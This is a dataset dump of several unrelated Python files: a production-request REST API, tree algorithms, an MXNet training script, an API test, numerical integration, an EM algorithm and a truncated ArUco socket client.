cr status:%s\" % (cr.get_attribute(\"status\")))\n ret = self.crdb.save(cr.json())\n return {'prepid': prepid, 'message': ret, 'results': True}\n else:\n ret = \"Chained request already in status done\"\n return {'prepid': prepid, 'message': ret, 'results': False}\n\n\nclass ForceStatusDoneToProcessing(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.crdb = database('chained_requests')\n self.before_request()\n self.count_call()\n self.representations = {'text/plain': self.output_text}\n\n def get(self, chained_request_ids):\n \"\"\"\n Move chained_request from force_done to processing\n \"\"\"\n if ',' in chained_request_ids:\n rlist = chained_request_ids.rsplit(',')\n res = []\n success = True\n for r in rlist:\n result = self.force_status(r)\n success = success and result.get('results', False)\n res.append(result)\n return dumps({'results': success, 'message': res}, indent=4)\n else:\n return dumps(self.force_status(chained_request_ids), indent=4)\n\n def force_status(self, prepid):\n if not self.crdb.document_exists(prepid):\n return dumps({\"results\": False,\n \"message\": \"Chained request with prepid {0} does not exist\".format(prepid)})\n cr = chained_request(self.crdb.get(prepid))\n if cr.get_attribute(\"status\") == \"force_done\":\n cr.set_status(to_status=\"processing\")\n self.logger.debug(\"Moving chain_req back to satus 'processing'. cr status:%s\" % (\n cr.get_attribute(\"status\")))\n ret = self.crdb.save(cr.json())\n return {'prepid': prepid, 'message': ret, 'results': True}\n else:\n ret = \"Chained request already in status done\"\n return {'prepid': prepid, 'message': ret, 'results': False}\n\n\nclass ToForceFlowList(RESTResource):\n\n access_limit = access_rights.generator_contact\n\n def __init__(self):\n self.ldb = database('lists')\n self.cdb = database('chained_requests')\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_ids):\n \"\"\"\n Add selected prepid's to global force complete list for later action\n \"\"\"\n if ',' in chained_request_ids:\n rlist = chained_request_ids.rsplit(',')\n else:\n rlist = [chained_request_ids]\n res = []\n __updated = False\n\n forceflow_list = self.ldb.get(\"list_of_forceflow\")\n # TO-DO check if prepid exists!\n # TO-DO check the status of chain_req!\n for el in rlist:\n if el not in forceflow_list[\"value\"]:\n forceflow_list[\"value\"].append(el)\n chain_req = chained_request(self.cdb.get(el))\n chain_req.update_history({'action': 'add_to_forceflow'})\n self.cdb.save(chain_req.json())\n res.append({\"prepid\": el, 'results': True, 'message': 'OK'})\n __updated = True\n else:\n res.append({\"prepid\": el, 'results': False, 'message': 'Chained request already in forceflow list'})\n\n # TO-DO check the update return value\n if __updated:\n self.ldb.update(forceflow_list)\n\n return res\n\n\nclass ChainedRequestsPriorityChange(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.chained_requests_db = database(\"chained_requests\")\n self.before_request()\n self.count_call()\n\n def post(self):\n fails = []\n for chain in loads(flask.request.data):\n chain_prepid = chain['prepid']\n mcm_chained_request = chained_request(self.chained_requests_db.get(chain_prepid))\n action_parameters = chain['action_parameters']\n if not mcm_chained_request.set_priority(action_parameters['block_number']):\n message = 'Unable to set new priority in request %s' % chain_prepid\n fails.append(message)\n self.logger.error(message)\n 
class ChainedRequestsPriorityChange(RESTResource):\n\n    access_limit = access_rights.production_manager\n\n    def __init__(self):\n        self.chained_requests_db = database(\"chained_requests\")\n        self.before_request()\n        self.count_call()\n\n    def post(self):\n        fails = []\n        for chain in loads(flask.request.data):\n            chain_prepid = chain['prepid']\n            mcm_chained_request = chained_request(self.chained_requests_db.get(chain_prepid))\n            action_parameters = chain['action_parameters']\n            if not mcm_chained_request.set_priority(action_parameters['block_number']):\n                message = 'Unable to set new priority in request %s' % chain_prepid\n                fails.append(message)\n                self.logger.error(message)\n            else:\n                mcm_chained_request.set_attribute('action_parameters', action_parameters)\n                if not mcm_chained_request.save():\n                    message = 'Unable to save chained request %s' % chain_prepid\n                    fails.append(message)\n                    self.logger.error(message)\n        return {\n            'results': True if len(fails) == 0 else False,\n            'message': fails}\n\n\nclass RemoveFromForceFlowList(RESTResource):\n\n    access_limit = access_rights.generator_contact\n\n    def __init__(self):\n        self.ldb = database('lists')\n        self.before_request()\n        self.count_call()\n\n    def delete(self, chained_request_ids):\n        \"\"\"\n        Remove selected prepids from global force_complete list\n        \"\"\"\n        if ',' in chained_request_ids:\n            rlist = chained_request_ids.rsplit(',')\n        else:\n            rlist = [chained_request_ids]\n        res = []\n\n        forceflow_list = self.ldb.get(\"list_of_forceflow\")\n        for el in rlist:\n            if el not in forceflow_list[\"value\"]:\n                res.append({\"prepid\": el, 'results': False, 'message': 'Not in forceflow list'})\n            else:\n                forceflow_list[\"value\"].remove(el)\n                res.append({\"prepid\": el, 'results': True, 'message': 'OK'})\n\n        # TO-DO check the update return value\n        ret = self.ldb.update(forceflow_list)\n\n        return res\n\n\nclass GetUniqueChainedRequestValues(RESTResource):\n    def __init__(self):\n        self.before_request()\n        self.count_call()\n\n    def get(self, field_name):\n        \"\"\"\n        Get unique values for navigation by field_name\n        \"\"\"\n        args = flask.request.args.to_dict()\n        db = database('requests')\n        return {'results': db.query_unique(field_name,\n                                           args.get('key', ''),\n                                           int(args.get('limit', 10)))}\n","sub_path":"mcm/rest_api/ChainedRequestActions.py","file_name":"ChainedRequestActions.py","file_ext":"py","file_size_in_byte":45759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"570804709","text":"__author__ = 'Paul Tune'\n\nclass Tree(object):\n    def __init__(self, key):\n        self.key = key\n        self.left = None\n        self.right = None\n\n\ndef insert_bst(root, val):\n    t = Tree(val)\n    if root is None:\n        return t\n\n    # attach the recursive insert back onto the correct child and pass val through\n    if root.key > val:\n        root.left = insert_bst(root.left, val)\n    else:\n        root.right = insert_bst(root.right, val)\n\n    return root\n\n\ndef lowest_common_ancestor_bst(root, p, q):\n    if root is None or p is None or q is None:\n        return None\n\n    if root.key > max(p.key, q.key):\n        return lowest_common_ancestor_bst(root.left, p, q)\n    elif root.key < min(p.key, q.key):\n        return lowest_common_ancestor_bst(root.right, p, q)\n    else:\n        return root\n\n\ndef lowest_common_ancestor_bst_iterative(root, p, q):\n    if p is None or q is None:\n        return None\n\n    curr = root\n    while curr is not None:\n        # both keys smaller than curr -> LCA is on the left; both larger -> on the right\n        if curr.key > max(p.key, q.key):\n            curr = curr.left\n        elif curr.key < min(p.key, q.key):\n            curr = curr.right\n        else:\n            return curr\n\n    return curr\n\n\n# top down approach O(n^2)\ndef lowest_common_ancestor_top_down(root, p, q):\n    if root is None or p is None or q is None:\n        return None\n\n    if root == p or root == q:\n        return root\n\n    total_matches = count_matches(root.left, p, q)\n    if total_matches == 1:\n        return root\n    elif total_matches == 2:\n        # recurse with the top-down routine itself; this is a general binary tree, not a BST\n        return lowest_common_ancestor_top_down(root.left, p, q)\n    else:\n        return lowest_common_ancestor_top_down(root.right, p, q)\n\n\n# returns number of nodes that matches p or q in the subtree\ndef count_matches(root, p, q):\n    if root is None:\n        return 0\n\n    # parenthesise the conditional expression, otherwise the whole sum becomes its value\n    return count_matches(root.left, p, q) + count_matches(root.right, p, q) + \\\n        (1 if root == p or root == q else 0)\n\n\ndef lowest_common_ancestor_bottom_up(root, p, q):\n    if root is None:\n        return None\n\n    if root == p or root == q:\n        return root\n\n    lft = 
lowest_common_ancestor_bottom_up(root.left, p, q)\n rgt = lowest_common_ancestor_bottom_up(root.right, p, q)\n if lft is not None and rgt is not None:\n return root\n return lft if lft is not None else rgt\n\n","sub_path":"practice/lowest_common_ancestor.py","file_name":"lowest_common_ancestor.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"624637465","text":"#!/usr/bin/env python3\n\nfrom __future__ import print_function\nimport logging\n#import pdb\nimport os, sys\nimport time\nimport subprocess as sp\nimport argparse, pickle\nfrom common import util\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score as auc_score, f1_score as f1, accuracy_score, precision_score, recall_score\nfrom sklearn.model_selection import train_test_split\nimport multiprocessing as mp\nimport mxnet as mx\nfrom mxnet import gluon, nd\nfrom mxnet.gluon import nn\nfrom mxnet.gluon.model_zoo import vision as models\nimport mxnet.autograd as autograd\nfrom mxnet.gluon import nn, Block, HybridBlock\n\n\ndef get_lr_scheduler(args):\n if 'lr_factor' not in args or args.lr_factor >= 1 or args.lr_step_epochs is None:\n print('Constant Learning Rate:%f' % args.lr)\n return None\n epoch_size = int(args.num_examples / args.batch_size )#* len(args.gpus.split(',')))\n begin_epoch = args.load_epoch if args.load_epoch else 0\n step_epochs = [int(l) for l in args.lr_step_epochs.split(',')]\n lr = args.lr\n for s in step_epochs:\n if begin_epoch >= s:\n lr *= args.lr_factor\n if lr != args.lr:\n logging.info('Adjust learning rate to %e for epoch %d' %(lr, begin_epoch))\n steps = [epoch_size * (x-begin_epoch) for x in step_epochs if x-begin_epoch > 0]\n print('LR steps: %s' % str(steps)) \n return mx.lr_scheduler.MultiFactorScheduler(step=steps, factor=args.lr_factor)\n \ndef add_data_args(parser):\n data = parser.add_argument_group('Data', 'the input images')\n data.add_argument('--data', type=str, help='the data', required=True)\n data.add_argument('--num-classes', type=int, default=2, help='the number of classes')\n data.add_argument('--num-examples', type=int, default=None, help='the number of training examples')\n data.add_argument('--crossvalid-fold', type=int, default=0, help='cross validation fold in [0,9]')\n data.add_argument('--val-size', type=int, default=512, help='size of validation set')\n return data\n \ndef add_data_aug_args(parser):\n aug = parser.add_argument_group('Image augmentations')\n aug.add_argument('--random-crop', type=int, default=0,\n help='if or not randomly crop the image')\n aug.add_argument('--random-mirror', type=int, default=0,\n help='if or not randomly flip horizontally')\n aug.add_argument('--max-random-aspect-ratio', type=float, default=0,\n help='max change of aspect ratio, whose range is [0, 1]')\n aug.add_argument('--max-random-rotate-angle', type=int, default=0,\n help='max angle to rotate, whose range is [0, 360]')\n aug.add_argument('--max-random-shear-ratio', type=float, default=0,\n help='max ratio to shear, whose range is [0, 1]')\n aug.add_argument('--max-random-scale', type=float, default=1,\n help='max ratio to scale')\n aug.add_argument('--min-random-scale', type=float, default=1,\n help='min ratio to scale, should >= img_size/input_shape. 
otherwise use --pad-size')\n return aug\n\ndef add_fit_args(parser):\n \"\"\"\n parser : argparse.ArgumentParser\n return a parser added with args required by fit\n \"\"\"\n train = parser.add_argument_group('Training', 'model training')\n train.add_argument('--gpus', type=str, default='0,1,2,3,4,5,6,7',\n help='list of gpus to run, e.g. 0 or 0,2,5. empty means using cpu')\n train.add_argument('--num-epochs', type=int, default=200,\n help='max num of epochs')\n train.add_argument('--lr', type=float, default=0.1,\n help='initial learning rate')\n train.add_argument('--lr-factor', type=float, default=0.1,\n help='the ratio to reduce lr on each step')\n train.add_argument('--lr-step-epochs', type=str,\n help='the epochs to reduce the lr, e.g. 30,60')\n train.add_argument('--model', type=str, required=True,\n help='pretrained model name') \n train.add_argument('--mom', type=float, default=0.9,\n help='momentum for sgd')\n train.add_argument('--wd', type=float, default=1e-4,\n help='weight decay for sgd')\n train.add_argument('--batch-size', type=int, default=256,\n help='the batch size')\n train.add_argument('--disp-batches', type=int, default=20,\n help='show progress for every n batches')\n train.add_argument('--model-pretrained', type=str, default=None,\n help='model pretained') \n train.add_argument('--model-save-prefix', type=str, default=None,\n help='model save prefix')\n train.add_argument('--load-epoch', type=int,\n help='load the model on an epoch using the model-load-prefix')\n train.add_argument('--save-all', type=int, default=0,\n help='save loss output, etc. after every epoch')\n \n return train\n \nparser = argparse.ArgumentParser(description=\"train phase2\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nadd_fit_args(parser)\nadd_data_args(parser)\nadd_data_aug_args(parser)\nargs = parser.parse_args()\n\nctx = [mx.gpu(int(i)) for i in args.gpus.split(',')]\n\nif args.model_save_prefix:\n model_save_path = os.path.join(args.model_save_prefix, util.getTimestamp())\n sp.call('mkdir -p ' + model_save_path, shell=True)\n log_filename = os.path.join(model_save_path, 'log_terminal.txt')\n tee = util.Tee(name=log_filename, mode='w')\n\nlogging.basicConfig(level=logging.INFO) \nlogging.info(' '.join(sys.argv))\nlogging.info(args)\n\nwith open(args.data, 'rb') as f:\n raw = pickle.load(f)\n\ntrain_image_size = int(raw['data'].shape[2] // 224 * 224)\naug_list=[]\nif args.random_mirror > 0:\n aug_list.append(mx.image.HorizontalFlipAug(0.5))\nif args.random_crop > 0:\n aug_list.append(mx.image.RandomSizedCropAug((train_image_size,train_image_size),\n min_area=0.4, ratio=(1,1), interp=10)) #.6\n\ndef aug(inputs):\n res=inputs\n for f in aug_list:\n res=f(res)\n return res\n\nraw_indices = list(range(raw['data'].shape[0]))\nlabel = (raw['label'] > 0).astype(np.float32)\nnp.random.seed(0)\nnp.random.shuffle(raw_indices)\n\nraw_indices = np.roll(raw_indices, -args.crossvalid_fold * args.val_size)\nindices_train, indices_val = raw_indices[args.val_size:], raw_indices[:args.val_size]\nargs.num_examples = len(indices_train)\ntrain_iter = gluon.data.DataLoader(\n gluon.data.ArrayDataset(raw['data'][indices_train], label[indices_train]), \n args.batch_size, shuffle=True, last_batch='rollover')\nval_iter = gluon.data.DataLoader(\n gluon.data.ArrayDataset(raw['data'][indices_val], label[indices_val]), \n args.batch_size, shuffle=False, last_batch='keep')\n\nval_uid = np.array(raw['uid'])[indices_val]\n\n############## model structure start ###########################\n\nget_model_func = 
eval('models.'+args.model)\nget_model_func_kwargs = dict(pretrained=True, ctx=ctx)\n \nif args.model.startswith('densenet'):\n get_model_func_kwargs.update(dropout=.2)\n\npretrained_model = get_model_func(**get_model_func_kwargs)\nfeatures = pretrained_model.features\nnew_features = nn.HybridSequential()\nnew_classifier = nn.HybridSequential()\n\nif args.model.startswith('resnet'):\n new_conv0_w = features[1].params.get('weight').data(ctx=ctx[0])[:,1:2].asnumpy()\n with new_features.name_scope():\n #new_features.add(gluon.nn.BatchNorm(in_channels=1))\n #new_features.add(ChannelWiseCenterNorm())\n new_features.add(gluon.nn.Conv2D(\n channels=new_conv0_w.shape[0],in_channels=1,\n kernel_size = new_conv0_w.shape[2:],\n strides=(2,2), padding=(3,3),use_bias=False))\n new_features[0].initialize(ctx=ctx) \n new_features[0].params.get('weight').set_data(new_conv0_w)\n [new_features.add(f) for f in features[2:]]\n \n with new_classifier.name_scope():\n for b in pretrained_model.classifier[:-1]:\n new_classifier.add(b)\n\nelif args.model.startswith('densenet'):\n new_conv0_w = features[0].params.get('weight').data(ctx=ctx[0])[:,1:2].asnumpy()\n with new_features.name_scope():\n #new_features.add(gluon.nn.BatchNorm(in_channels=1))\n #new_features[0].initialize(ctx=ctx)\n #new_features.add(ChannelWiseCenterNorm())\n new_features.add(gluon.nn.Conv2D(\n channels=new_conv0_w.shape[0],in_channels=1,\n kernel_size = new_conv0_w.shape[2:],\n strides=(2,2), padding=(3,3),use_bias=False)) \n new_features[0].initialize(ctx=ctx)\n new_features[0].params.get('weight').set_data(new_conv0_w)\n [new_features.add(f) for f in features[1:]]\n \n\nwith new_classifier.name_scope():\n new_classifier.add(nn.Dense(args.num_classes))\n new_classifier[-1].params.initialize(mx.init.Xavier(), ctx=ctx)\n\nnet = nn.HybridSequential()\nwith net.name_scope():\n #for f in new_features: net.add(f)\n #for f in new_classifier: net.add(f)\n #net.add(ChannelWiseCenterNorm())\n net.add(new_features)\n \n # load weights if provided\n if args.model_pretrained:\n net.collect_params().load(filename=args.model_pretrained, ctx=ctx, ignore_extra=True)\n net.add(new_classifier)\n net.hybridize()\n\n# return metrics string representation\ndef metric_str(names, accs):\n return ', '.join(['%s=%0.4f'%(name, acc) for name, acc in zip(names, accs)])\n\ndef evaluate(label, output):\n pred = np.argmax(output, axis=1)\n res = dict(acc=accuracy_score(y_true=label, y_pred=pred),\n pcs=precision_score(y_true=label, y_pred=pred),\n recall=recall_score(y_true=label, y_pred=pred),\n auc=auc_score(y_true=label, y_score=output[:,1]))\n return res#{ k:round(res[k] * 10000) / 10000. 
for k in res.keys()}\n\nloss = mx.gluon.loss.SoftmaxCrossEntropyLoss()\ntrainer = gluon.Trainer(net.collect_params(), 'adam',{'learning_rate': args.lr, 'wd':args.wd,'lr_scheduler':get_lr_scheduler(args)})\nbest_val_loss = 9999.\nbest_val_auc = 0.8\nbest_val_acc = 0.7\nfor epoch in range(args.num_epochs):\n # mxnet gluon save requires model has run forward before save.\n #if epoch==1:\n #net.export(os.path.join(model_save_path, 'model.json'))\n tic = time.time()\n \n train_epoch_outputs = []\n train_epoch_labels = []\n train_epoch_losses = []\n logging.info('[Epoch %d]' % epoch)\n ######## train #########\n for i, batch in enumerate(train_iter):\n if len(aug_list) > 0:\n train_batch_data = nd.transpose(batch[0], axes=(0,2,3,1))\n train_batch_data = nd.stack(*(aug(_) for _ in train_batch_data))\n train_batch_data = nd.transpose(train_batch_data, axes=(0,3,1,2))\n else:\n train_batch_data = batch[0]\n data = gluon.utils.split_and_load(train_batch_data, ctx_list=ctx, batch_axis=0)\n label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0)\n with autograd.record():\n outputs = [net(_) for _ in data]\n losses = [loss(z,y) for z,y in zip(outputs,label)]\n [_.backward() for _ in losses]\n trainer.step(batch[0].shape[0])\n \n train_epoch_outputs.append(np.concatenate([nd.softmax(_, axis=1).asnumpy() for _ in outputs]))\n train_epoch_losses.append(np.concatenate([_.asnumpy() for _ in losses]))\n train_epoch_labels.append(batch[1].asnumpy())\n\n nd.waitall()\n train_epoch_outputs = np.concatenate(train_epoch_outputs)\n train_epoch_labels = np.concatenate(train_epoch_labels)\n train_epoch_losses = np.concatenate(train_epoch_losses).mean()\n\n train_metrics_epoch = dict(loss=train_epoch_losses)\n train_metrics_epoch.update(evaluate(train_epoch_labels, train_epoch_outputs))\n \n logging.info('training :' + metric_str(train_metrics_epoch.keys(), train_metrics_epoch.values()))\n \n ######## validation #########\n \n val_epoch_outputs = []\n val_epoch_labels = []\n val_epoch_losses = [] \n \n for i, batch in enumerate(val_iter):\n data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0)\n label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0)\n\n outputs = [net(_) for _ in data]\n losses = [loss(z,y) for z,y in zip(outputs,label)]\n \n val_epoch_outputs.append(np.concatenate([nd.softmax(_, axis=1).asnumpy() for _ in outputs]))\n val_epoch_losses.append(np.concatenate([_.asnumpy() for _ in losses]))\n val_epoch_labels.append(batch[1].asnumpy())\n\n nd.waitall()\n val_epoch_outputs = np.concatenate(val_epoch_outputs)\n val_epoch_labels = np.concatenate(val_epoch_labels)\n val_epoch_losses = np.concatenate(val_epoch_losses).mean()\n\n\n val_metrics_epoch = dict(loss=val_epoch_losses)\n val_metrics_epoch.update(evaluate(val_epoch_labels, val_epoch_outputs))\n \n logging.info('validation:' + metric_str(val_metrics_epoch.keys(), val_metrics_epoch.values()))\n logging.info('time cost: %f'% (time.time()-tic))\n\n if args.model_save_prefix is None:\n continue\n \n if args.save_all > 0:\n dumps = dict(val_uid=val_uid,\n val_epoch_outputs=val_epoch_outputs,\n val_epoch_labels=val_epoch_labels,\n val_epoch_losses=val_epoch_losses,\n train_epoch_outputs=train_epoch_outputs,\n train_epoch_labels=train_epoch_labels,\n train_epoch_losses=train_epoch_losses)\n dumps_path = os.path.join(model_save_path, 'phase2-%04d-dumps.pkl'%epoch)\n with open(dumps_path, 'wb') as f:\n pickle.dump(dumps, f, pickle.HIGHEST_PROTOCOL)\n \n suffix=[]\n toBeSaved = False\n if 
val_metrics_epoch['loss'] < best_val_loss:\n        suffix.append('LOSS%0.3f' % val_metrics_epoch['loss'])\n        best_val_loss = val_metrics_epoch['loss']\n        toBeSaved = True\n    else:\n        suffix.append('loss%0.3f' % val_metrics_epoch['loss'])\n\n    if val_metrics_epoch['auc'] > best_val_auc:\n        suffix.append('AUC%0.3f' % val_metrics_epoch['auc'])\n        best_val_auc = val_metrics_epoch['auc']\n        toBeSaved = True\n    else:\n        suffix.append('auc%0.3f' % val_metrics_epoch['auc'])\n\n    if val_metrics_epoch['acc'] > best_val_acc:\n        suffix.append('ACC%0.3f' % val_metrics_epoch['acc'])\n        best_val_acc = val_metrics_epoch['acc']\n        toBeSaved = True\n    else:\n        suffix.append('acc%0.3f' % val_metrics_epoch['acc'])\n\n    if toBeSaved or args.save_all > 0:\n        logging.info('Best %s. Checkpointing...' % ' '.join(suffix))\n        #net.collect_params().save(os.path.join(model_save_path, 'phase2-%d_%s.params'%(epoch,'_'.join(suffix))))\n\n        net.export(os.path.join(model_save_path, 'phase2-%04d_%s'%(epoch,'_'.join(suffix))))\n\n\n","sub_path":"Dataprocessing/train_phase2.py","file_name":"train_phase2.py","file_ext":"py","file_size_in_byte":15095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"108095563","text":"#-*-coding:utf-8 -*-\n__author__ = 'SUNWEIWEI002'\nfrom common.getconfig import GetConfig\nfrom common.verify import Verify\nfrom nose.plugins.attrib import attr\nfrom common.requestslib import RequestsLib\nfrom common.getexpectdata import GetExpectData\nfrom ddt import ddt,data\n\n@attr('searchfromhuazhu','hhub3')\n@ddt\nclass TestSearchFromHuazhu():\n    @classmethod\n    def setup_class(self):\n        self.conf = GetConfig()\n        self.verity=Verify()\n        self.url = self.conf.get_conf_value(\"hhub3\",\"url\")+r\"api/Invoice/SearchFromHuazhu\"\n        self.requestslib = RequestsLib()\n\n    @data(\n        [0,1],[0,2],[0,4],[0,8],[0,16],[0,32],[0,64],[0,128],[0,512],[0,1024],[0,2048],\n        [1,1],[1,2],[1,4],[1,8],[1,16],[1,32],[1,64],[1,128],[1,512],[1,1024],[1,2048],\n        [2,1],[2,2],[2,4],[2,8],[2,16],[2,32],[2,64],[2,128],[2,512],[2,1024],[2,2048],\n\n    )\n\n    def testsearchfromhuazhu_status(self, hac):\n        u'Query all invoice information; each combination of invoice type and sort order should return 200'\n        requests_body={\n            \"HotelStyle\": hac[0],\n            \"citySource\": hac[1],\n        }\n        response = self.requestslib.send_request_by_accesstoken(\"get\", self.url, requests_body)\n        self.verity.by_status(response,200)\n\n","sub_path":"testproject/hhub3/invoice/searchfromhuazhu/testsearchfromhuazhu.py","file_name":"testsearchfromhuazhu.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"301839996","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 21 21:51:38 2019\n\n@author: pablo gullith\n\"\"\"\nG = 6.674e-11\nL = 10\nM = 10000\nsigma = M/L**2\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Double Gaussian quadrature based on Mark Newman's algorithm\n\ndef gaussxw(Ni,Nj):\n\n    a = np.linspace(3,4*Ni-1,Ni)/(4*Ni+2)\n    b = np.linspace(3,4*Nj-1,Nj)/(4*Nj+2)\n    x = np.cos(np.pi*a+1/(8*Ni*Ni*np.tan(a)))\n    y = np.cos(np.pi*b+1/(8*Nj*Nj*np.tan(b)))\n\n    tol = 1e-15\n    teta = 100.0\n    while (teta > tol):\n        P0x = np.ones(Ni,float)\n        P1x = np.copy(x)\n        for k in range(1,Ni):\n            P0x,P1x = P1x,((2*k+1)*x*P1x-k*P0x)/(k+1)\n        dPx = (Ni+1)*(P0x-x*P1x)/(1-x**2)\n        dx = P1x/dPx\n        x = x - dx\n        teta = np.max(abs(dx))\n    teta = 100.0\n    while (teta > tol):\n        P0y = np.ones(Nj,float)\n        P1y = np.copy(y)\n        for k in range(1,Nj):\n            P0y,P1y = P1y,((2*k+1)*y*P1y-k*P0y)/(k+1)\n        dPy = (Nj+1)*(P0y-y*P1y)/(1-y**2)\n        dy = P1y/dPy\n        y = y - dy\n        teta = np.max(abs(dy))\n\n    wx = 2*(Ni+1)*(Ni+1)/(Ni*Ni*(1-x*x)*dPx**2)\n    wy = 2*(Nj+1)*(Nj+1)/(Nj*Nj*(1-y*y)*dPy**2)\n\n    return x,y,wx,wy\n\n# Usual definitions\n\ndef gaussxw_a(Ni,Nj,xi,xf,yi,yf):\n    x,y,wx,wy = gaussxw(Ni,Nj)\n    return 0.5*(xf-xi)*x+0.5*(xf+xi),0.5*(xf-xi)*wx , 0.5*(yf-yi)*y+0.5*(yf+yi),0.5*(yf-yi)*wy\n\ndef f(x,y,z):\n    return (x**2+y**2+z**2)**(-3/2)\n\n
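# (Added note, assumptions mine) f above is the integrand of the plate's pull along z:\n#   F_z = G * sigma * z * \\iint_{-L/2}^{L/2} dx dy / (x^2 + y^2 + z^2)^(3/2)\n# the constant prefactor G*sigma*z is applied after the double integral (see Fz below).\n\n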
def Gaussian(Ni,Nj,xi,xf,yi,yf,z):\n    x,wx,y,wy = gaussxw_a(Ni,Nj,xi,xf,yi,yf)\n    s = 0\n    for i in range(Ni):\n        for j in range(Nj):\n            s = s + wx[i]*wy[j]*f(x[i],y[j],z)\n    return s\n\nxi = yi = -L/2\nxf = yf = L/2\n\nNi = 100\nNj = 100\n\nz = np.linspace(0,10,1000)\nR = Gaussian(Ni,Nj,xi,xf,yi,yf,z)\nFz = G*sigma*z*R\n\nplt.plot(z,Fz)\nplt.xlabel('z')\nplt.ylabel('Magnitude')\nplt.title('Gravitational force')\nplt.show()\nplt.style.use('seaborn')\n\nNi = 1500\nNj = 1500\n\ndef S(i,N):\n    if (i == 0 or i == N):\n        return(1/2)\n    else:\n        return 1\n\ndef Simp2(xi,xf,yi,yf,Ni,Nj,z):\n    hx = (xf - xi)/Ni\n    hy = (yf - yi)/Nj\n    s = 0.0\n    for i in range(Ni+1):\n        for j in range(Nj+1):\n            s = s + S(i,Ni)*S(j,Nj)*f(xi + i*hx, yi + j*hy, z)\n    return (hx*hy*s)\n\nR = Simp2(xi,xf,yi,yf,Ni,Nj,z)\nFz = G*sigma*z*R\nplt.clf()\nplt.plot(z,Fz)\nplt.xlabel('z')\nplt.ylabel('Magnitude')\nplt.title('Gravitational force')\nplt.show()\nplt.style.use('seaborn')\n# Comments\n# In Gaussian quadrature some functions are not handled well.\n# To get around that we can either use another integration method or\n# increase N, so that we get more points close to the origin, but a huge\n# number of them would be needed, and the more points there are,\n# the slower the program runs.\n# We use 1500 because with smaller numbers the plots are not satisfactory","sub_path":"Questao4.py","file_name":"Questao4.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"144984408","text":"import numpy as np\nfrom scipy.stats import multivariate_normal\n\nfrom HW_4 import utils\n\n\nclass EM:\n\n    def __init__(self, seed, no_of_gaussian, gaussian_dimensions, cov_diagonal_multiplier) -> None:\n        super().__init__()\n        self.seed = seed\n        self.no_of_gaussian = no_of_gaussian\n        self.gaussian_dimensions = gaussian_dimensions\n        self.mean = None\n        self.cov = None\n        self.mixture_coefficient = None\n        self.z_i_m = None\n        self.cov_diagonal_multiplier = cov_diagonal_multiplier\n        np.random.seed(seed)\n\n    def e_step(self, data):\n        p0 = multivariate_normal.pdf(data, mean=self.mean[0], cov=self.cov[0])\n        p1 = multivariate_normal.pdf(data, mean=self.mean[1], cov=self.cov[1])\n        probs = np.array([p0, p1])\n        z_i_m = (probs * self.mixture_coefficient) / np.sum(probs * self.mixture_coefficient, axis=0)\n        self.z_i_m = z_i_m\n\n    def m_step(self, data):\n        mean0 = np.sum(self.z_i_m[0] * data.T, axis=1) / np.sum(self.z_i_m[0])\n        mean1 = np.sum(self.z_i_m[1] * data.T, axis=1) / np.sum(self.z_i_m[1])\n        p0, p1 = np.sum(self.z_i_m, axis=1) / data.shape[0]\n        sigma0 = np.dot((self.z_i_m[0] * (data - mean0).T), (data - mean0)) / np.sum(self.z_i_m[0])\n        sigma1 = np.dot((self.z_i_m[1] * (data - mean1).T), (data - mean1)) / np.sum(self.z_i_m[1])\n\n        self.mean = np.array([mean0, mean1])\n        self.cov = np.array([sigma0, sigma1])\n        self.mixture_coefficient = np.array([[p0], [p1]])\n\n    def train(self, data, epochs, display_step):\n        self.z_i_m = np.random.random((self.no_of_gaussian, data.shape[0]))\n        self.z_i_m = self.z_i_m / np.sum(self.z_i_m, axis=0)\n\n        for i in range(epochs):\n
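            # (Added note) z_i_m holds the responsibilities gamma(z_im), randomly initialised\n            # above, so each epoch runs the M-step first (means, covariances and mixing\n            # weights re-estimated from the current responsibilities) before the E-step refresh.\n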
            self.m_step(data)\n            self.e_step(data)\n\n            # if i % display_step == 0 or i == 0:\n            #     self.plot_gaussian(data)\n\n    def plot_gaussian(self, data):\n        print(\"Mean\", self.mean)\n        print(\"Cov\", self.cov)\n        print(\"Pie\", self.mixture_coefficient)\n\n\ndef demo_em_on_mixture_of_two_gaussian_data():\n    data = utils.get_mixture_of_two_gaussian_data()\n    em = EM(42, 2, 2, 0.01)\n    em.train(data, 100, 1000)\n    print(\"Mean\", em.mean)\n    print(\"Sigma\", em.cov)\n    print(\"Mixture Coefficients\", em.mixture_coefficient)\n\n\nif __name__ == '__main__':\n    demo_em_on_mixture_of_two_gaussian_data()\n","sub_path":"src/HW_4/EM_for_2_gaussian.py","file_name":"EM_for_2_gaussian.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"459748110","text":"import socket\nimport cv2\nfrom cv2 import aruco\n\nvid = cv2.VideoCapture(0)\naruco_dict = aruco.Dictionary_get(aruco.DICT_7X7_250)\n\nclient = []\n\nclient.append(socket.socket())\nclient.append(socket.socket())\nhost = '192.168.43.18'\nhost1 = ''\nport = 8090\nprint(\"Waiting for connection\")\ntry:\n    client[0].connect((host, port))\n    print(\"Connected!!\")\nexcept socket.error as e:\n    print(str(e))\nprint(\"Waiting for connection\")\ntry:\n    client[1].connect((host1, port))\n    print(\"Connected!!\")\nexcept socket.error as e:\n    print(str(e))\nfor i in range(0, 